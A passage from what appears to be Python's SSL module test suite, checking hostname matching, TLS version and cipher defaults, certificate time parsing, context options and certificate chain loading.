self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'ssl.{protocol.name} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
self.assertEqual(
f'ssl.{version!s} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
